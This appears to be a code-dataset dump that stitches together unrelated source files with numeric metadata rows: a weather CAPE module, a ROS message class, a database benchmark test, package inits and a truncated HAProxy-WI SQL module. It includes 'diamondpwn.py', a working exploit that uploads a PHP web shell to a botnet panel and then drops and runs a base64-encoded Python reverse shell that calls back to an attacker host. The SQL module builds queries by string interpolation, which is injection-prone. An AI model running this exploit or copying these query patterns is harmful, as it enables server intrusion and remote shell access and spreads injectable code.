# isort: skip_file # flake8: noqa: F401 from datasets.plugins.executors.metaflow_executor import MetaflowExecutor from datasets.plugins.batch.batch_dataset_plugin import BatchDatasetPlugin from datasets.plugins.batch.batch_flow_dataset_plugin import BatchFlowDatasetPlugin from datasets.plugins.register_plugins import register register()
37.777778
83
0.873529
41
340
7.04878
0.512195
0.16609
0.262976
0.16609
0.200692
0
0
0
0
0
0
0.012698
0.073529
340
8
84
42.5
0.904762
0.102941
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.8
0
0.8
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
697ca0d1f3efb545a4526819889ead2a821a811a
8,940
py
Python
src/wrf/g_cape.py
khallock/wrf-python
9c5825c101722e7eddece2ca13cc8e9d9f96a21e
[ "Apache-2.0" ]
1
2018-10-30T18:06:26.000Z
2018-10-30T18:06:26.000Z
src/wrf/g_cape.py
mostamndi/wrf-python
3806bcdd01b31fa67da980eafefa0d1245faf6a6
[ "Apache-2.0" ]
null
null
null
src/wrf/g_cape.py
mostamndi/wrf-python
3806bcdd01b31fa67da980eafefa0d1245faf6a6
[ "Apache-2.0" ]
null
null
null
from __future__ import (absolute_import, division, print_function) import numpy as np import numpy.ma as ma from .extension import _tk, _cape from .destag import destagger from .constants import default_fill, Constants, ConversionFactors from .util import extract_vars from .metadecorators import set_cape_metadata @set_cape_metadata(is2d=True) def get_2dcape(wrfin, timeidx=0, method="cat", squeeze=True, cache=None, meta=True, _key=None, missing=default_fill(np.float64)): """Return the 2d fields of MCAPE, MCIN, LCL, and LFC. The leftmost dimension of the returned array represents four different quantities: - return_val[0,...] will contain MCAPE [J kg-1] - return_val[1,...] will contain MCIN [J kg-1] - return_val[2,...] will contain LCL [m] - return_val[3,...] will contain LFC [m] This functions extracts the necessary variables from the NetCDF file object in order to perform the calculation. Args: wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \ iterable): WRF-ARW NetCDF data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile` or an iterable sequence of the aforementioned types. timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The desired time index. This value can be a positive integer, negative integer, or :data:`wrf.ALL_TIMES` (an alias for None) to return all times in the file or sequence. The default is 0. method (:obj:`str`, optional): The aggregation method to use for sequences. Must be either 'cat' or 'join'. 'cat' combines the data along the Time dimension. 'join' creates a new dimension for the file index. The default is 'cat'. squeeze (:obj:`bool`, optional): Set to False to prevent dimensions with a size of 1 from being automatically removed from the shape of the output. Default is True. cache (:obj:`dict`, optional): A dictionary of (varname, ndarray) that can be used to supply pre-extracted NetCDF variables to the computational routines. It is primarily used for internal purposes, but can also be used to improve performance by eliminating the need to repeatedly extract the same variables used in multiple diagnostics calculations, particularly when using large sequences of files. Default is None. meta (:obj:`bool`, optional): Set to False to disable metadata and return :class:`numpy.ndarray` instead of :class:`xarray.DataArray`. Default is True. _key (:obj:`int`, optional): A caching key. This is used for internal purposes only. Default is None. missing (:obj:`float`): The fill value to use for the output. Default is :data:`wrf.default_fill(np.float64)`. Returns: :class:`xarray.DataArray` or :class:`numpy.ndarray`: The cape, cin, lcl, and lfc values as an array whose leftmost dimension is 4 (0=CAPE, 1=CIN, 2=LCL, 3=LFC). If xarray is enabled and the *meta* parameter is True, then the result will be a :class:`xarray.DataArray` object. Otherwise, the result will be a :class:`numpy.ndarray` object with no metadata. """ varnames = ("T", "P", "PB", "QVAPOR", "PH","PHB", "HGT", "PSFC") ncvars = extract_vars(wrfin, timeidx, varnames, method, squeeze, cache, meta=False, _key=_key) t = ncvars["T"] p = ncvars["P"] pb = ncvars["PB"] qv = ncvars["QVAPOR"] ph = ncvars["PH"] phb = ncvars["PHB"] ter = ncvars["HGT"] psfc = ncvars["PSFC"] full_t = t + Constants.T_BASE full_p = p + pb tk = _tk(full_p, full_t) geopt = ph + phb geopt_unstag = destagger(geopt, -3) z = geopt_unstag/Constants.G # Convert pressure to hPa p_hpa = ConversionFactors.PA_TO_HPA * full_p psfc_hpa = ConversionFactors.PA_TO_HPA * psfc i3dflag = 0 ter_follow = 1 cape_cin = _cape(p_hpa, tk, qv, z, ter, psfc_hpa, missing, i3dflag, ter_follow) left_dims = cape_cin.shape[1:-3] right_dims = cape_cin.shape[-2:] resdim = (4,) + left_dims + right_dims # Make a new output array for the result result = np.zeros(resdim, cape_cin.dtype) # Cape 2D output is not flipped in the vertical, so index from the # end result[0,...,:,:] = cape_cin[0,...,-1,:,:] result[1,...,:,:] = cape_cin[1,...,-1,:,:] result[2,...,:,:] = cape_cin[1,...,-2,:,:] result[3,...,:,:] = cape_cin[1,...,-3,:,:] return ma.masked_values(result, missing) @set_cape_metadata(is2d=False) def get_3dcape(wrfin, timeidx=0, method="cat", squeeze=True, cache=None, meta=True, _key=None, missing=default_fill(np.float64)): """Return the three-dimensional CAPE and CIN. The leftmost dimension of the returned array represents two different quantities: - return_val[0,...] will contain CAPE [J kg-1] - return_val[1,...] will contain CIN [J kg-1] This functions extracts the necessary variables from the NetCDF file object in order to perform the calculation. Args: wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \ iterable): WRF-ARW NetCDF data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile` or an iterable sequence of the aforementioned types. timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The desired time index. This value can be a positive integer, negative integer, or :data:`wrf.ALL_TIMES` (an alias for None) to return all times in the file or sequence. The default is 0. method (:obj:`str`, optional): The aggregation method to use for sequences. Must be either 'cat' or 'join'. 'cat' combines the data along the Time dimension. 'join' creates a new dimension for the file index. The default is 'cat'. squeeze (:obj:`bool`, optional): Set to False to prevent dimensions with a size of 1 from being automatically removed from the shape of the output. Default is True. cache (:obj:`dict`, optional): A dictionary of (varname, ndarray) that can be used to supply pre-extracted NetCDF variables to the computational routines. It is primarily used for internal purposes, but can also be used to improve performance by eliminating the need to repeatedly extract the same variables used in multiple diagnostics calculations, particularly when using large sequences of files. Default is None. meta (:obj:`bool`, optional): Set to False to disable metadata and return :class:`numpy.ndarray` instead of :class:`xarray.DataArray`. Default is True. _key (:obj:`int`, optional): A caching key. This is used for internal purposes only. Default is None. missing (:obj:`float`): The fill value to use for the output. Default is :data:`wrf.default_fill(np.float64)`. Returns: :class:`xarray.DataArray` or :class:`numpy.ndarray`: The CAPE and CIN as an array whose leftmost dimension is 2 (0=CAPE, 1=CIN). If xarray is enabled and the *meta* parameter is True, then the result will be a :class:`xarray.DataArray` object. Otherwise, the result will be a :class:`numpy.ndarray` object with no metadata. """ varnames = ("T", "P", "PB", "QVAPOR", "PH", "PHB", "HGT", "PSFC") ncvars = extract_vars(wrfin, timeidx, varnames, method, squeeze, cache, meta=False, _key=_key) t = ncvars["T"] p = ncvars["P"] pb = ncvars["PB"] qv = ncvars["QVAPOR"] ph = ncvars["PH"] phb = ncvars["PHB"] ter = ncvars["HGT"] psfc = ncvars["PSFC"] full_t = t + Constants.T_BASE full_p = p + pb tk = _tk(full_p, full_t) geopt = ph + phb geopt_unstag = destagger(geopt, -3) z = geopt_unstag/Constants.G # Convert pressure to hPa p_hpa = ConversionFactors.PA_TO_HPA * full_p psfc_hpa = ConversionFactors.PA_TO_HPA * psfc i3dflag = 1 ter_follow = 1 cape_cin = _cape(p_hpa, tk, qv, z, ter, psfc_hpa, missing, i3dflag, ter_follow) return ma.masked_values(cape_cin, missing)
39.210526
80
0.600895
1,179
8,940
4.473282
0.195081
0.023891
0.01934
0.015169
0.845468
0.843003
0.843003
0.81532
0.787637
0.787637
0
0.010863
0.299776
8,940
228
81
39.210526
0.831629
0.623154
0
0.619718
0
0
0.03281
0
0
0
0
0
0
1
0.028169
false
0
0.112676
0
0.169014
0.014085
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
69972a915cdf9c88c71fa8302c0e2d231ece3ffc
1,020
py
Python
alpyro_msgs/control_msgs/pointheadactionresult.py
rho2/alpyro_msgs
b5a680976c40c83df70d61bb2db1de32a1cde8d3
[ "MIT" ]
1
2020-12-13T13:07:10.000Z
2020-12-13T13:07:10.000Z
alpyro_msgs/control_msgs/pointheadactionresult.py
rho2/alpyro_msgs
b5a680976c40c83df70d61bb2db1de32a1cde8d3
[ "MIT" ]
null
null
null
alpyro_msgs/control_msgs/pointheadactionresult.py
rho2/alpyro_msgs
b5a680976c40c83df70d61bb2db1de32a1cde8d3
[ "MIT" ]
null
null
null
from typing import Final from alpyro_msgs import RosMessage from alpyro_msgs.actionlib_msgs.goalstatus import GoalStatus from alpyro_msgs.control_msgs.pointheadresult import PointHeadResult from alpyro_msgs.std_msgs.header import Header class PointHeadActionResult(RosMessage): __msg_typ__ = "control_msgs/PointHeadActionResult" __msg_def__ = "c3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogIHVpbnQzMiBzZXEKICB0aW1lIHN0YW1wCiAgc3RyaW5nIGZyYW1lX2lkCmFjdGlvbmxpYl9tc2dzL0dvYWxTdGF0dXMgc3RhdHVzCiAgdWludDggUEVORElORz0wCiAgdWludDggQUNUSVZFPTEKICB1aW50OCBQUkVFTVBURUQ9MgogIHVpbnQ4IFNVQ0NFRURFRD0zCiAgdWludDggQUJPUlRFRD00CiAgdWludDggUkVKRUNURUQ9NQogIHVpbnQ4IFBSRUVNUFRJTkc9NgogIHVpbnQ4IFJFQ0FMTElORz03CiAgdWludDggUkVDQUxMRUQ9OAogIHVpbnQ4IExPU1Q9OQogIGFjdGlvbmxpYl9tc2dzL0dvYWxJRCBnb2FsX2lkCiAgICB0aW1lIHN0YW1wCiAgICBzdHJpbmcgaWQKICB1aW50OCBzdGF0dXMKICBzdHJpbmcgdGV4dApjb250cm9sX21zZ3MvUG9pbnRIZWFkUmVzdWx0IHJlc3VsdAoK" __md5_sum__ = "1eb06eeff08fa7ea874431638cb52332" header: Header status: GoalStatus result: PointHeadResult
63.75
570
0.927451
53
1,020
17.415094
0.45283
0.043337
0.060672
0
0
0
0
0
0
0
0
0.085744
0.05098
1,020
15
571
68
0.867769
0
0
0
0
0
0.605882
0.605882
0
1
0
0
0
1
0
false
0
0.416667
0
1
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
1
0
1
0
0
6
69a849b0b0d31685236e4b7817251ac307df64d4
4,391
py
Python
Vault7/Xiphos/DiamondFox/diamondpwn.py
dendisuhubdy/grokmachine
120a21a25c2730ed356739231ec8b99fc0575c8b
[ "BSD-3-Clause" ]
46
2017-05-15T11:15:08.000Z
2018-07-02T03:32:52.000Z
Vault7/Xiphos/DiamondFox/diamondpwn.py
dendisuhubdy/grokmachine
120a21a25c2730ed356739231ec8b99fc0575c8b
[ "BSD-3-Clause" ]
null
null
null
Vault7/Xiphos/DiamondFox/diamondpwn.py
dendisuhubdy/grokmachine
120a21a25c2730ed356739231ec8b99fc0575c8b
[ "BSD-3-Clause" ]
24
2017-05-17T03:26:17.000Z
2018-07-09T07:00:50.000Z
#!/usr/bin/python2 # coding: utf-8 import requests import sys clear = "\x1b[0m" blue = "\x1b[1;34m" cyan = "\x1b[1;36m" red = "\x1b[1;31m" green = "\x1b[1;32m" def upload_shell(base_url): files={'upload1':('file.log.php', "<?php @assert(filter_input(0,woot,516)); ?>")} data={'slots': '1'} url = base_url + "/post.php" sys.stdout.write(cyan+"{*} Attempting shell upload..."+clear) sys.stdout.flush() try: requests.post(url=url, files=files, data=data) except Exception, e: sys.stdout.write(red+" [failed]\n"+clear) sys.stdout.flush() sys.exit("Stack Trace: \n%s" %(str(e))) try: output = execute_php(base_url=base_url, php="print md5('pwned');") except Exception, e: sys.stdout.write(red+" [failed]\n"+clear) sys.stdout.flush() sys.exit("Stack Trace: \n%s" %(str(e))) if "5e93de3efa544e85dcd6311732d28f95" in output: sys.stdout.write(green+" [success]\n"+clear) def upload_backconnect(base_url): sys.stdout.write(cyan+"{*} Uploading Backconnect..."+clear) encoded_shell = "IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK" cbdrop = """$hack = "%s";$x = fopen("/tmp/x", "w+");fwrite($x, base64_decode($hack));fclose($x);echo "dongs";""" %(encoded_shell) lol = execute_php(base_url, php=php_encoder(cbdrop)) if "dongs" in lol: sys.stdout.write(green+" [done]\n"+clear) def execute_php(base_url, php): shell_url = base_url + "/logs/dump/file.log.php" data={'woot': php} r = requests.post(url=shell_url, data=data) return r.text def php_encoder(php): encoded = php.encode('base64') encoded = encoded.replace("\n", "") encoded = encoded.strip() code = "eval(base64_decode('%s'));" %(encoded) return code def pop_reverse(base_url, cb_host, cb_port): upload_shell(base_url) upload_backconnect(base_url) print "%s{*} Sending backconnect to %s%s:%s%s" %(cyan, green, cb_host, cb_port, clear) execute_php(base_url, php="system('python /tmp/x %s %s');" %(cb_host, cb_port)) print "%s{$} bl1ngbl1ng!!%s" %(blue, clear) def main(args): if len(args) != 4: sys.exit("use: %s http://bot.net/Panel hacke.rs 31337" %(args[0])) pop_reverse(base_url=args[1], cb_host=args[2], cb_port=args[3]) if __name__ == "__main__": main(args=sys.argv)
65.537313
2,106
0.800501
340
4,391
10.197059
0.35
0.026247
0.024228
0.019614
0.064609
0.047303
0.047303
0.047303
0.047303
0.047303
0
0.072599
0.096561
4,391
66
2,107
66.530303
0.801361
0.00706
0
0.192982
0
0.017544
0.618632
0.513079
0
1
0
0
0.017544
0
null
null
0
0.035088
null
null
0.052632
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
1
1
null
1
0
0
0
1
0
0
0
0
0
0
0
0
6
69c29d675a3901f6528dc709efd71ea6ba298177
241
py
Python
brainless/__init__.py
loaiabdalslam/Brainless
d363e0d713fc9b024a4fac990b9c39cd59769454
[ "MIT" ]
1
2020-02-28T12:12:21.000Z
2020-02-28T12:12:21.000Z
brainless/__init__.py
loaiabdalslam/Brainless
d363e0d713fc9b024a4fac990b9c39cd59769454
[ "MIT" ]
null
null
null
brainless/__init__.py
loaiabdalslam/Brainless
d363e0d713fc9b024a4fac990b9c39cd59769454
[ "MIT" ]
null
null
null
from brainless._version import __version__ from brainless.predictor import Predictor from brainless.utils_models import load_ml_model from brainless.algorithm.classifier import Classifier from brainless.algorithm.regressor import Regressor
34.428571
53
0.883817
30
241
6.833333
0.433333
0.317073
0.214634
0
0
0
0
0
0
0
0
0
0.087137
241
6
54
40.166667
0.931818
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
0e0457ccab9ce4536a0cf6a29b6919ac41da1609
5,338
py
Python
test_runner/performance/test_parallel_copy_to.py
libzenith/zenith
4b3b19f4448f650b918230d972e2ec68815dcbdb
[ "ECL-2.0", "Apache-2.0" ]
189
2021-03-30T13:09:46.000Z
2022-03-22T15:34:38.000Z
test_runner/performance/test_parallel_copy_to.py
zenithdb/zenith
4b3b19f4448f650b918230d972e2ec68815dcbdb
[ "ECL-2.0", "Apache-2.0" ]
991
2021-04-05T14:37:16.000Z
2022-03-31T23:11:03.000Z
test_runner/performance/test_parallel_copy_to.py
zenithdb/zenith
4b3b19f4448f650b918230d972e2ec68815dcbdb
[ "ECL-2.0", "Apache-2.0" ]
18
2021-04-06T04:05:50.000Z
2022-03-07T18:05:51.000Z
from io import BytesIO import asyncio import asyncpg from fixtures.zenith_fixtures import ZenithEnv, Postgres from fixtures.log_helper import log from fixtures.benchmark_fixture import MetricReport, ZenithBenchmarker pytest_plugins = ("fixtures.zenith_fixtures", "fixtures.benchmark_fixture") async def repeat_bytes(buf, repetitions: int): for i in range(repetitions): yield buf async def copy_test_data_to_table(pg: Postgres, worker_id: int, table_name: str): buf = BytesIO() for i in range(1000): buf.write( f"{i}\tLoaded by worker {worker_id}. Long string to consume some space.\n".encode()) buf.seek(0) copy_input = repeat_bytes(buf.read(), 5000) pg_conn = await pg.connect_async() await pg_conn.copy_to_table(table_name, source=copy_input) async def parallel_load_different_tables(pg: Postgres, n_parallel: int): workers = [] for worker_id in range(n_parallel): worker = copy_test_data_to_table(pg, worker_id, f'copytest_{worker_id}') workers.append(asyncio.create_task(worker)) # await all workers await asyncio.gather(*workers) # Load 5 different tables in parallel with COPY TO def test_parallel_copy_different_tables(zenith_simple_env: ZenithEnv, zenbenchmark: ZenithBenchmarker, n_parallel=5): env = zenith_simple_env # Create a branch for us env.zenith_cli(["branch", "test_parallel_copy_different_tables", "empty"]) pg = env.postgres.create_start('test_parallel_copy_different_tables') log.info("postgres is running on 'test_parallel_copy_different_tables' branch") # Open a connection directly to the page server that we'll use to force # flushing the layers to disk psconn = env.pageserver.connect() pscur = psconn.cursor() # Get the timeline ID of our branch. We need it for the 'do_gc' command conn = pg.connect() cur = conn.cursor() cur.execute("SHOW zenith.zenith_timeline") timeline = cur.fetchone()[0] for worker_id in range(n_parallel): cur.execute(f'CREATE TABLE copytest_{worker_id} (i int, t text)') with zenbenchmark.record_pageserver_writes(env.pageserver, 'pageserver_writes'): with zenbenchmark.record_duration('load'): asyncio.run(parallel_load_different_tables(pg, n_parallel)) # Flush the layers from memory to disk. This is included in the reported # time and I/O pscur.execute(f"do_gc {env.initial_tenant} {timeline} 0") # Record peak memory usage zenbenchmark.record("peak_mem", zenbenchmark.get_peak_mem(env.pageserver) / 1024, 'MB', report=MetricReport.LOWER_IS_BETTER) # Report disk space used by the repository timeline_size = zenbenchmark.get_timeline_size(env.repo_dir, env.initial_tenant, timeline) zenbenchmark.record('size', timeline_size / (1024 * 1024), 'MB', report=MetricReport.LOWER_IS_BETTER) async def parallel_load_same_table(pg: Postgres, n_parallel: int): workers = [] for worker_id in range(n_parallel): worker = copy_test_data_to_table(pg, worker_id, f'copytest') workers.append(asyncio.create_task(worker)) # await all workers await asyncio.gather(*workers) # Load data into one table with COPY TO from 5 parallel connections def test_parallel_copy_same_table(zenith_simple_env: ZenithEnv, zenbenchmark: ZenithBenchmarker, n_parallel=5): env = zenith_simple_env # Create a branch for us env.zenith_cli(["branch", "test_parallel_copy_same_table", "empty"]) pg = env.postgres.create_start('test_parallel_copy_same_table') log.info("postgres is running on 'test_parallel_copy_same_table' branch") # Open a connection directly to the page server that we'll use to force # flushing the layers to disk psconn = env.pageserver.connect() pscur = psconn.cursor() # Get the timeline ID of our branch. We need it for the 'do_gc' command conn = pg.connect() cur = conn.cursor() cur.execute("SHOW zenith.zenith_timeline") timeline = cur.fetchone()[0] cur.execute(f'CREATE TABLE copytest (i int, t text)') with zenbenchmark.record_pageserver_writes(env.pageserver, 'pageserver_writes'): with zenbenchmark.record_duration('load'): asyncio.run(parallel_load_same_table(pg, n_parallel)) # Flush the layers from memory to disk. This is included in the reported # time and I/O pscur.execute(f"do_gc {env.initial_tenant} {timeline} 0") # Record peak memory usage zenbenchmark.record("peak_mem", zenbenchmark.get_peak_mem(env.pageserver) / 1024, 'MB', report=MetricReport.LOWER_IS_BETTER) # Report disk space used by the repository timeline_size = zenbenchmark.get_timeline_size(env.repo_dir, env.initial_tenant, timeline) zenbenchmark.record('size', timeline_size / (1024 * 1024), 'MB', report=MetricReport.LOWER_IS_BETTER)
37.858156
96
0.666354
688
5,338
4.953488
0.219477
0.021127
0.037559
0.029343
0.801056
0.742371
0.718603
0.710681
0.710681
0.659624
0
0.010214
0.248033
5,338
140
97
38.128571
0.838814
0.155864
0
0.593023
0
0
0.160312
0.06466
0
0
0
0
0
1
0.023256
false
0
0.069767
0
0.093023
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
38b3930510c7f655ed2192a6dd6be6d530f8167e
35
py
Python
pycuteweb/__init__.py
MatteoMeneghetti/pycuteweb
00a887a1ade717722807ccdf7e907ac7af2fac8e
[ "MIT" ]
1
2020-11-23T14:32:48.000Z
2020-11-23T14:32:48.000Z
pycuteweb/__init__.py
matteomeneghetti/pycuteweb
00a887a1ade717722807ccdf7e907ac7af2fac8e
[ "MIT" ]
null
null
null
pycuteweb/__init__.py
matteomeneghetti/pycuteweb
00a887a1ade717722807ccdf7e907ac7af2fac8e
[ "MIT" ]
null
null
null
from .pycuteweb import Application
17.5
34
0.857143
4
35
7.5
1
0
0
0
0
0
0
0
0
0
0
0
0.114286
35
1
35
35
0.967742
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
c7fd5a18f4cacb78cfc3fc91e01368640fd76090
24
py
Python
psy/irt/__init__.py
Alias-Alan/pypsy
f055fe1f4901b654d99d9a776152e8192e014f5f
[ "MIT" ]
169
2017-08-29T01:35:49.000Z
2022-03-01T05:03:02.000Z
psy/irt/__init__.py
a854367688/pypsy
f055fe1f4901b654d99d9a776152e8192e014f5f
[ "MIT" ]
8
2017-12-05T05:20:35.000Z
2021-10-03T05:40:45.000Z
psy/irt/__init__.py
a854367688/pypsy
f055fe1f4901b654d99d9a776152e8192e014f5f
[ "MIT" ]
67
2017-09-01T04:18:54.000Z
2022-02-24T08:21:18.000Z
from psy.irt import grm
12
23
0.791667
5
24
3.8
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
24
1
24
24
0.95
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2a0cd6c2618e35a94bc55ef02d0418e339f9e5fa
48,788
py
Python
app/sql.py
lgrawet/haproxy-wi
a28741435dc10c6aafe662050e587f08536583f2
[ "Apache-2.0" ]
null
null
null
app/sql.py
lgrawet/haproxy-wi
a28741435dc10c6aafe662050e587f08536583f2
[ "Apache-2.0" ]
null
null
null
app/sql.py
lgrawet/haproxy-wi
a28741435dc10c6aafe662050e587f08536583f2
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import funct mysql_enable = funct.get_config_var('mysql', 'enable') if mysql_enable == '1': import mysql.connector as sqltool else: db = "/var/www/haproxy-wi/app/haproxy-wi.db" import sqlite3 as sqltool def get_cur(): try: if mysql_enable == '0': con = sqltool.connect(db, isolation_level=None) else: mysql_user = funct.get_config_var('mysql', 'mysql_user') mysql_password = funct.get_config_var('mysql', 'mysql_password') mysql_db = funct.get_config_var('mysql', 'mysql_db') mysql_host = funct.get_config_var('mysql', 'mysql_host') mysql_port = funct.get_config_var('mysql', 'mysql_port') con = sqltool.connect(user=mysql_user, password=mysql_password, host=mysql_host, port=mysql_port, database=mysql_db) cur = con.cursor() except sqltool.Error as e: funct.logging('DB ', ' '+e, haproxywi=1, login=1) else: return con, cur def add_user(user, email, password, role, group, activeuser): con, cur = get_cur() if password != 'aduser': sql = """INSERT INTO user (username, email, password, role, groups, activeuser) VALUES ('%s', '%s', '%s', '%s', '%s', '%s')""" % (user, email, funct.get_hash(password), role, group, activeuser) else: sql = """INSERT INTO user (username, email, role, groups, ldap_user, activeuser) VALUES ('%s', '%s', '%s', '%s', '1', '%s')""" % (user, email, role, group, activeuser) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def update_user(user, email, role, group, id, activeuser): con, cur = get_cur() sql = """update user set username = '%s', email = '%s', role = '%s', groups = '%s', activeuser = '%s' where id = '%s'""" % (user, email, role, group, activeuser, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def update_user_password(password, id): con, cur = get_cur() sql = """update user set password = '%s' where id = '%s'""" % (funct.get_hash(password), id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def delete_user(id): con, cur = get_cur() sql = """delete from user where id = '%s'""" % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def add_group(name, description): con, cur = get_cur() sql = """INSERT INTO groups (name, description) VALUES ('%s', '%s')""" % (name, description) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def delete_group(id): con, cur = get_cur() sql = """ delete from groups where id = '%s'""" % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def update_group(name, descript, id): con, cur = get_cur() sql = """ update groups set name = '%s', description = '%s' where id = '%s'; """ % (name, descript, id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() return False else: return True cur.close() con.close() def add_server(hostname, ip, group, typeip, enable, master, cred, port, desc, haproxy, nginx): con, cur = get_cur() sql = """ INSERT INTO servers (hostname, ip, groups, type_ip, enable, master, cred, port, `desc`, haproxy, nginx) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s') """ % (hostname, ip, group, typeip, enable, master, cred, port, desc, haproxy, nginx) try: cur.execute(sql) con.commit() return True except sqltool.Error as e: funct.out_error(e) con.rollback() return False cur.close() con.close() def delete_server(id): con, cur = get_cur() sql = """ delete from servers where id = '%s'""" % (id) try: cur.execute(sql) con.commit() except sqltool.Error as e: funct.out_error(e) con.rollback() else: return True cur.close() con.close() def update_hapwi_server(id, alert, metrics, active): con, cur = get_cur() sql = """ update servers set alert = '%s', metrics = '%s', active = '%s' where id = '%s'""" % (alert, metrics, active, id) try: cur.execute(sql) con.commit() except 